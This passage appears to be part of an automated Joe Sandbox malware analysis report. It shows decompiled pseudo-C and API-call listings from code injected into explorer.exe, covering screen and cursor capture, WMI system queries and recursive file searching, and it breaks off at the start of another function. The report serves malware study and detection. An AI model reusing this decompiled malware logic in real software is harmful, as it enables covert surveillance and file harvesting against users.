                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 032E5D10
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 032E5D18
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 032E5D22
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 032E5D34
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 032E5D58
                                                                                                            • GetCursorInfo.USER32(?), ref: 032E5D69
                                                                                                            • CopyIcon.USER32 ref: 032E5D7E
                                                                                                            • GetIconInfo.USER32(00000000,?), ref: 032E5D8C
                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 032E5DAA
                                                                                                            • DrawIconEx.USER32 ref: 032E5DC2
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 032E5DCF
                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 032E5DE9
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 032E5E65
                                                                                                            • DeleteDC.GDI32(00000000), ref: 032E5F16
                                                                                                            • DeleteDC.GDI32(00000000), ref: 032E5F21
                                                                                                            • DeleteObject.GDI32(00000000), ref: 032E5F2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
                                                                                                            • String ID: ($6
                                                                                                            • API String ID: 192358524-4149066357
                                                                                                            • Opcode ID: b71cfc2de499fa481c6dcd2a88a67a40cf8a4880bac0520acceefe7ab628898b
                                                                                                            • Instruction ID: 94bb3d208aa9f562210cca721232a19215d4c505307601c713f20f01a73baa61
                                                                                                            • Opcode Fuzzy Hash: b71cfc2de499fa481c6dcd2a88a67a40cf8a4880bac0520acceefe7ab628898b
                                                                                                            • Instruction Fuzzy Hash: 79812A72D10219AFDB20DFA5DC49BAEBBB8EF49710F548069E504F7250DB709A85CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 30%
                                                                                                            			E032EE503(void* __ecx) {
                                                                                                            				char _v8;
                                                                                                            				void* _v12;
                                                                                                            				char* _t15;
                                                                                                            				intOrPtr* _t16;
                                                                                                            				void* _t21;
                                                                                                            				intOrPtr* _t23;
                                                                                                            				intOrPtr* _t24;
                                                                                                            				intOrPtr* _t25;
                                                                                                            				void* _t30;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_v12 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                            				_t15 =  &_v12;
                                                                                                            				__imp__CoCreateInstance(0x32fc8a0, 0, 1, 0x32fc8b0, _t15);
                                                                                                            				if(_t15 < 0) {
                                                                                                            					L5:
                                                                                                            					_t23 = _v8;
                                                                                                            					if(_t23 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                            					}
                                                                                                            					_t24 = _v12;
                                                                                                            					if(_t24 != 0) {
                                                                                                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                            					}
                                                                                                            					_t16 = 0;
                                                                                                            				} else {
                                                                                                            					__imp__#2(__ecx);
                                                                                                            					_t25 = _v12;
                                                                                                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                            					if(_t21 < 0) {
                                                                                                            						goto L5;
                                                                                                            					} else {
                                                                                                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                            						if(_t21 < 0) {
                                                                                                            							goto L5;
                                                                                                            						} else {
                                                                                                            							_t16 = E032E8D70(8);
                                                                                                            							if(_t16 == 0) {
                                                                                                            								goto L5;
                                                                                                            							} else {
                                                                                                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                            								 *_t16 = _v8;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t16;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE516
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE527
                                                                                                            • CoCreateInstance.OLE32(032FC8A0,00000000,00000001,032FC8B0,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE53E
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE549
                                                                                                            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE574
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1610782348-0
                                                                                                            • Opcode ID: 22c5262464d34f14ca18390457dd37243c4886914d7b222049f619a0750c4aad
                                                                                                            • Instruction ID: 12f322411fa4a624a98f79da8765b7ac83b6fce5a7becc5820bb083cab735d8b
                                                                                                            • Opcode Fuzzy Hash: 22c5262464d34f14ca18390457dd37243c4886914d7b222049f619a0750c4aad
                                                                                                            • Instruction Fuzzy Hash: FF213770610245BFEB249B62DC5DEAFBF7CEFC6F10F01406DB515A6290D6B19A80CA30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032EC134(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                            				char _v12;
                                                                                                            				WCHAR* _v16;
                                                                                                            				struct _WIN32_FIND_DATAW _v608;
                                                                                                            				WCHAR* _t24;
                                                                                                            				intOrPtr _t31;
                                                                                                            				intOrPtr _t41;
                                                                                                            				void* _t45;
                                                                                                            				intOrPtr _t46;
                                                                                                            				void* _t48;
                                                                                                            				intOrPtr _t54;
                                                                                                            				void* _t59;
                                                                                                            				char _t60;
                                                                                                            				void* _t61;
                                                                                                            				void* _t62;
                                                                                                            				void* _t63;
                                                                                                            				void* _t75;
                                                                                                            
                                                                                                            				_t75 = __fp0;
                                                                                                            				_push(0);
                                                                                                            				_t48 = __ecx;
                                                                                                            				_push(L"\\*");
                                                                                                            				_t24 = E032E9BF7(__ecx);
                                                                                                            				_t63 = _t62 + 0xc;
                                                                                                            				_v16 = _t24;
                                                                                                            				if(_t24 == 0) {
                                                                                                            					return _t24;
                                                                                                            				}
                                                                                                            				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                                                            				if(_t59 == 0xffffffff) {
                                                                                                            					L14:
                                                                                                            					return E032E8D86( &_v16, 0xfffffffe);
                                                                                                            				} else {
                                                                                                            					goto L2;
                                                                                                            				}
                                                                                                            				do {
                                                                                                            					L2:
                                                                                                            					if(E032EC10C( &(_v608.cFileName)) != 0) {
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                            						L10:
                                                                                                            						_push(0);
                                                                                                            						_push( &(_v608.cFileName));
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_t60 = E032E9BF7(_t48);
                                                                                                            						_t63 = _t63 + 0x10;
                                                                                                            						_v12 = _t60;
                                                                                                            						if(_t60 != 0) {
                                                                                                            							_t54 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            							 *((intOrPtr*)(_t54 + 0xc0))(1);
                                                                                                            							_push(1);
                                                                                                            							_push(1);
                                                                                                            							_push(0);
                                                                                                            							E032EC134(_t60, _t75, 1, 5, E032F0197, _a16);
                                                                                                            							_t63 = _t63 + 0x1c;
                                                                                                            							E032E8D86( &_v12, 0xfffffffe);
                                                                                                            						}
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					_t61 = 0;
                                                                                                            					do {
                                                                                                            						_t7 = _t61 + 0x32ff9ec; // 0x0
                                                                                                            						_push( *_t7);
                                                                                                            						_push( &(_v608.cFileName));
                                                                                                            						_t41 =  *0x32ff8ec; // 0x52ef998
                                                                                                            						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                                                            							goto L8;
                                                                                                            						}
                                                                                                            						_t45 = E032F0197(_t75, _t48,  &_v608, _a16);
                                                                                                            						_t63 = _t63 + 0xc;
                                                                                                            						if(_t45 == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t46 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            						 *((intOrPtr*)(_t46 + 0xc0))(1);
                                                                                                            						L8:
                                                                                                            						_t61 = _t61 + 4;
                                                                                                            					} while (_t61 < 4);
                                                                                                            					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                            						goto L12;
                                                                                                            					}
                                                                                                            					goto L10;
                                                                                                            					L12:
                                                                                                            				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                                                            				_t31 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            				 *((intOrPtr*)(_t31 + 0x80))(_t59);
                                                                                                            				goto L14;
                                                                                                            			}




















                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 032EC165
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 032EC248
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1690352074-0
                                                                                                            • Opcode ID: 8b459bfb988cbd1a48a314ac298447e85faf57df63dd074ff7b9dda66f830024
                                                                                                            • Instruction ID: 6b7b348922c0cd02e6f57cf4f1b6a498a119e9448f92548226764533805f5ffb
                                                                                                            • Opcode Fuzzy Hash: 8b459bfb988cbd1a48a314ac298447e85faf57df63dd074ff7b9dda66f830024
                                                                                                            • Instruction Fuzzy Hash: 3331A775A102256FDB10EBE4DC8EFAA776CEB00B60F4441A4F915EA1C1F67199C4CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,032E51C8,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 032EA20F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2086374402-0
                                                                                                            • Opcode ID: 17edaeb87e5e04832c74df5f0f2e51612374ba5863030131931917f577c5c896
                                                                                                            • Instruction ID: 86b1909eca353c5301dc78dafe1edd0b84685c00b5b385d32cc7d930d1030d76
                                                                                                            • Opcode Fuzzy Hash: 17edaeb87e5e04832c74df5f0f2e51612374ba5863030131931917f577c5c896
                                                                                                            • Instruction Fuzzy Hash: ACE048769003147FDB10EE689D05B5AF7BDEB80610F5585559C42F7344E570AA448691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E032EEB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				char _v24;
                                                                                                            				void* _v28;
                                                                                                            				signed int _v32;
                                                                                                            				char _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed int _v44;
                                                                                                            				char _v48;
                                                                                                            				char _v52;
                                                                                                            				intOrPtr _v56;
                                                                                                            				signed int _v60;
                                                                                                            				char* _v72;
                                                                                                            				signed short _v80;
                                                                                                            				signed int _v84;
                                                                                                            				char _v88;
                                                                                                            				char _v92;
                                                                                                            				char _v96;
                                                                                                            				intOrPtr _v100;
                                                                                                            				char _v104;
                                                                                                            				char _v616;
                                                                                                            				intOrPtr* _t159;
                                                                                                            				char _t165;
                                                                                                            				signed int _t166;
                                                                                                            				signed int _t173;
                                                                                                            				signed int _t178;
                                                                                                            				signed int _t186;
                                                                                                            				intOrPtr* _t187;
                                                                                                            				signed int _t188;
                                                                                                            				signed int _t192;
                                                                                                            				intOrPtr* _t193;
                                                                                                            				intOrPtr _t200;
                                                                                                            				intOrPtr* _t205;
                                                                                                            				signed int _t207;
                                                                                                            				signed int _t209;
                                                                                                            				intOrPtr* _t210;
                                                                                                            				intOrPtr _t212;
                                                                                                            				intOrPtr* _t213;
                                                                                                            				signed int _t214;
                                                                                                            				char _t217;
                                                                                                            				signed int _t218;
                                                                                                            				signed int _t219;
                                                                                                            				signed int _t230;
                                                                                                            				signed int _t235;
                                                                                                            				signed int _t242;
                                                                                                            				signed int _t243;
                                                                                                            				signed int _t244;
                                                                                                            				signed int _t245;
                                                                                                            				intOrPtr* _t247;
                                                                                                            				intOrPtr* _t251;
                                                                                                            				signed int _t252;
                                                                                                            				intOrPtr* _t253;
                                                                                                            				void* _t255;
                                                                                                            				intOrPtr* _t261;
                                                                                                            				signed int _t262;
                                                                                                            				signed int _t283;
                                                                                                            				signed int _t289;
                                                                                                            				char* _t298;
                                                                                                            				void* _t320;
                                                                                                            				signed int _t322;
                                                                                                            				intOrPtr* _t323;
                                                                                                            				intOrPtr _t324;
                                                                                                            				signed int _t327;
                                                                                                            				intOrPtr* _t328;
                                                                                                            				intOrPtr* _t329;
                                                                                                            
                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                            				_v60 = _v60 & 0x00000000;
                                                                                                            				_v56 = __edx;
                                                                                                            				_v100 = __ecx;
                                                                                                            				_t159 = E032EE503(__ecx);
                                                                                                            				_t251 = _t159;
                                                                                                            				_v104 = _t251;
                                                                                                            				if(_t251 == 0) {
                                                                                                            					return _t159;
                                                                                                            				}
                                                                                                            				_t320 = E032E8D70(0x10);
                                                                                                            				_v36 = _t320;
                                                                                                            				_pop(_t255);
                                                                                                            				if(_t320 == 0) {
                                                                                                            					L53:
                                                                                                            					E032E8D86( &_v60, 0xfffffffe);
                                                                                                            					E032EE5B7( &_v104);
                                                                                                            					return _t320;
                                                                                                            				}
                                                                                                            				_t165 = E032E9F8F(_t255, 0x30f);
                                                                                                            				 *_t328 = 0x2ad;
                                                                                                            				_v52 = _t165;
                                                                                                            				_t166 = E032E9F8F(_t255);
                                                                                                            				_push(0);
                                                                                                            				_push(_v56);
                                                                                                            				_v20 = _t166;
                                                                                                            				_push(_t166);
                                                                                                            				_push(_a4);
                                                                                                            				_t322 = E032E9BF7(_t165);
                                                                                                            				_v60 = _t322;
                                                                                                            				E032E8D41( &_v52);
                                                                                                            				E032E8D41( &_v20);
                                                                                                            				_t329 = _t328 + 0x20;
                                                                                                            				if(_t322 != 0) {
                                                                                                            					_t323 = __imp__#2;
                                                                                                            					_v40 =  *_t323(_t322);
                                                                                                            					_t173 = E032E9F8F(_t255, 0x103e);
                                                                                                            					_v20 = _t173;
                                                                                                            					_v52 =  *_t323(_t173);
                                                                                                            					E032E8D41( &_v20);
                                                                                                            					_t324 = _v40;
                                                                                                            					_t261 =  *_t251;
                                                                                                            					_t252 = 0;
                                                                                                            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                            					__eflags = _t178;
                                                                                                            					if(_t178 != 0) {
                                                                                                            						L52:
                                                                                                            						__imp__#6(_t324);
                                                                                                            						__imp__#6(_v52);
                                                                                                            						goto L53;
                                                                                                            					}
                                                                                                            					_t262 = _v32;
                                                                                                            					_v28 = 0;
                                                                                                            					_v20 = 0;
                                                                                                            					__eflags = _t262;
                                                                                                            					if(_t262 == 0) {
                                                                                                            						L49:
                                                                                                            						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                            						__eflags = _t252;
                                                                                                            						if(_t252 == 0) {
                                                                                                            							E032E8D86( &_v36, 0);
                                                                                                            							_t320 = _v36;
                                                                                                            						} else {
                                                                                                            							 *(_t320 + 8) = _t252;
                                                                                                            							 *_t320 = E032E9A5A(_v100);
                                                                                                            							 *((intOrPtr*)(_t320 + 4)) = E032E9A5A(_v56);
                                                                                                            						}
                                                                                                            						goto L52;
                                                                                                            					} else {
                                                                                                            						goto L6;
                                                                                                            					}
                                                                                                            					while(1) {
                                                                                                            						L6:
                                                                                                            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                            						__eflags = _t186;
                                                                                                            						if(_t186 != 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_v16 = 0;
                                                                                                            						_v48 = 0;
                                                                                                            						_v12 = 0;
                                                                                                            						_v24 = 0;
                                                                                                            						__eflags = _v84;
                                                                                                            						if(_v84 == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t187 = _v28;
                                                                                                            						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                            						__eflags = _t188;
                                                                                                            						if(_t188 >= 0) {
                                                                                                            							__imp__#20(_v24, 1,  &_v16);
                                                                                                            							__imp__#19(_v24, 1,  &_v48);
                                                                                                            							_t46 = _t320 + 0xc; // 0xc
                                                                                                            							_t253 = _t46;
                                                                                                            							_t327 = _t252 << 3;
                                                                                                            							_t47 = _t327 + 8; // 0x8
                                                                                                            							_t192 = E032E8E04(_t327, _t47);
                                                                                                            							__eflags = _t192;
                                                                                                            							if(_t192 == 0) {
                                                                                                            								__imp__#16(_v24);
                                                                                                            								_t193 = _v28;
                                                                                                            								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                            								L46:
                                                                                                            								_t252 = _v20;
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E032E8D70( *(_t327 +  *_t253) << 3);
                                                                                                            							_t200 =  *_t253;
                                                                                                            							__eflags =  *(_t327 + _t200 + 4);
                                                                                                            							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                            								_t136 = _t320 + 0xc; // 0xc
                                                                                                            								E032E8D86(_t136, 0);
                                                                                                            								E032E8D86( &_v36, 0);
                                                                                                            								__imp__#16(_v24);
                                                                                                            								_t205 = _v28;
                                                                                                            								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                            								_t320 = _v36;
                                                                                                            								goto L46;
                                                                                                            							}
                                                                                                            							_t207 = _v16;
                                                                                                            							while(1) {
                                                                                                            								_v12 = _t207;
                                                                                                            								__eflags = _t207 - _v48;
                                                                                                            								if(_t207 > _v48) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_v44 = _v44 & 0x00000000;
                                                                                                            								_t209 =  &_v12;
                                                                                                            								__imp__#25(_v24, _t209,  &_v44);
                                                                                                            								__eflags = _t209;
                                                                                                            								if(_t209 < 0) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								_t212 = E032E9A5A(_v44);
                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                            								_t213 = _v28;
                                                                                                            								_t281 =  *_t213;
                                                                                                            								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                            								__eflags = _t214;
                                                                                                            								if(_t214 < 0) {
                                                                                                            									L39:
                                                                                                            									__imp__#6(_v44);
                                                                                                            									_t207 = _v12 + 1;
                                                                                                            									__eflags = _t207;
                                                                                                            									continue;
                                                                                                            								}
                                                                                                            								_v92 = E032E9F8F(_t281, 0x3f4);
                                                                                                            								 *_t329 = 0x1b4;
                                                                                                            								_t217 = E032E9F8F(_t281);
                                                                                                            								_t283 = _v80;
                                                                                                            								_v96 = _t217;
                                                                                                            								_t218 = _t283 & 0x0000ffff;
                                                                                                            								__eflags = _t218 - 0xb;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									_t219 = _t218 - 0x10;
                                                                                                            									__eflags = _t219;
                                                                                                            									if(_t219 == 0) {
                                                                                                            										L35:
                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E032E8D70(0x18);
                                                                                                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                            										__eflags = _t289;
                                                                                                            										if(_t289 == 0) {
                                                                                                            											L38:
                                                                                                            											E032E8D41( &_v92);
                                                                                                            											E032E8D41( &_v96);
                                                                                                            											__imp__#9( &_v80);
                                                                                                            											goto L39;
                                                                                                            										}
                                                                                                            										_push(_v72);
                                                                                                            										_push(L"%d");
                                                                                                            										L37:
                                                                                                            										_push(0xc);
                                                                                                            										_push(_t289);
                                                                                                            										E032E9FEE();
                                                                                                            										_t329 = _t329 + 0x10;
                                                                                                            										goto L38;
                                                                                                            									}
                                                                                                            									_t230 = _t219 - 1;
                                                                                                            									__eflags = _t230;
                                                                                                            									if(_t230 == 0) {
                                                                                                            										L33:
                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E032E8D70(0x18);
                                                                                                            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                            										__eflags = _t289;
                                                                                                            										if(_t289 == 0) {
                                                                                                            											goto L38;
                                                                                                            										}
                                                                                                            										_push(_v72);
                                                                                                            										_push(L"%u");
                                                                                                            										goto L37;
                                                                                                            									}
                                                                                                            									_t235 = _t230 - 1;
                                                                                                            									__eflags = _t235;
                                                                                                            									if(_t235 == 0) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									__eflags = _t235 == 1;
                                                                                                            									if(_t235 == 1) {
                                                                                                            										goto L33;
                                                                                                            									}
                                                                                                            									L28:
                                                                                                            									__eflags = _t283 & 0x00002000;
                                                                                                            									if((_t283 & 0x00002000) == 0) {
                                                                                                            										_v88 = E032E9F8F(_t283, 0x12c);
                                                                                                            										E032E9FEE( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                            										E032E8D41( &_v88);
                                                                                                            										_t329 = _t329 + 0x18;
                                                                                                            										_t298 =  &_v616;
                                                                                                            										L31:
                                                                                                            										_t242 = E032E9A5A(_t298);
                                                                                                            										L32:
                                                                                                            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                            										goto L38;
                                                                                                            									}
                                                                                                            									_t242 = E032EEA2B( &_v80);
                                                                                                            									goto L32;
                                                                                                            								}
                                                                                                            								if(__eflags == 0) {
                                                                                                            									__eflags = _v72 - 0xffff;
                                                                                                            									_t298 = L"TRUE";
                                                                                                            									if(_v72 != 0xffff) {
                                                                                                            										_t298 = L"FALSE";
                                                                                                            									}
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								_t243 = _t218 - 1;
                                                                                                            								__eflags = _t243;
                                                                                                            								if(_t243 == 0) {
                                                                                                            									goto L38;
                                                                                                            								}
                                                                                                            								_t244 = _t243 - 1;
                                                                                                            								__eflags = _t244;
                                                                                                            								if(_t244 == 0) {
                                                                                                            									goto L35;
                                                                                                            								}
                                                                                                            								_t245 = _t244 - 1;
                                                                                                            								__eflags = _t245;
                                                                                                            								if(_t245 == 0) {
                                                                                                            									goto L35;
                                                                                                            								}
                                                                                                            								__eflags = _t245 != 5;
                                                                                                            								if(_t245 != 5) {
                                                                                                            									goto L28;
                                                                                                            								}
                                                                                                            								_t298 = _v72;
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            							__imp__#16(_v24);
                                                                                                            							_t210 = _v28;
                                                                                                            							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                            							_t252 = _v20;
                                                                                                            							L42:
                                                                                                            							_t262 = _v32;
                                                                                                            							_t252 = _t252 + 1;
                                                                                                            							_v20 = _t252;
                                                                                                            							__eflags = _t262;
                                                                                                            							if(_t262 != 0) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							L48:
                                                                                                            							_t324 = _v40;
                                                                                                            							goto L49;
                                                                                                            						}
                                                                                                            						_t247 = _v28;
                                                                                                            						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                            						goto L42;
                                                                                                            					}
                                                                                                            					_t262 = _v32;
                                                                                                            					goto L48;
                                                                                                            				} else {
                                                                                                            					E032E8D86( &_v36, _t322);
                                                                                                            					_t320 = _v36;
                                                                                                            					goto L53;
                                                                                                            				}
                                                                                                            			}





































































                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eeda8
                                                                                                            0x00000000
                                                                                                            0x032eeda8
                                                                                                            0x032eeeea
                                                                                                            0x032eeef0
                                                                                                            0x032eeef6
                                                                                                            0x032eeef9
                                                                                                            0x032eeefc
                                                                                                            0x032eeefc
                                                                                                            0x032eeeff
                                                                                                            0x032eef00
                                                                                                            0x032eef03
                                                                                                            0x032eef05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eef55
                                                                                                            0x032eef55
                                                                                                            0x00000000
                                                                                                            0x032eef55
                                                                                                            0x032eec8c
                                                                                                            0x032eec92
                                                                                                            0x00000000
                                                                                                            0x032eec92
                                                                                                            0x032eef52
                                                                                                            0x00000000
                                                                                                            0x032eebd5
                                                                                                            0x032eebda
                                                                                                            0x032eebdf
                                                                                                            0x00000000
                                                                                                            0x032eebe3

                                                                                                            APIs
                                                                                                              • Part of subcall function 032EE503: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE516
                                                                                                              • Part of subcall function 032EE503: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE527
                                                                                                              • Part of subcall function 032EE503: CoCreateInstance.OLE32(032FC8A0,00000000,00000001,032FC8B0,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE53E
                                                                                                              • Part of subcall function 032EE503: SysAllocString.OLEAUT32(00000000), ref: 032EE549
                                                                                                              • Part of subcall function 032EE503: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE574
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EEBF0
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EEC04
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EEF8D
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EEF96
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                            • String ID: FALSE$TRUE
                                                                                                            • API String ID: 1290676130-1412513891
                                                                                                            • Opcode ID: 3792d26281ea845996512fa34bffe595c0f7b2858296b5f0024fed7f22200f6a
                                                                                                            • Instruction ID: da1e39da99162b1fee6e43e7448182776a40e47ceffc8212f7b1f783b3e0a6c0
                                                                                                            • Opcode Fuzzy Hash: 3792d26281ea845996512fa34bffe595c0f7b2858296b5f0024fed7f22200f6a
                                                                                                            • Instruction Fuzzy Hash: 04E19175E10219AFCB14EFE4C899EEEBBB9FF48310F544059E505EB284DB71A981CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032EE040(void* __fp0) {
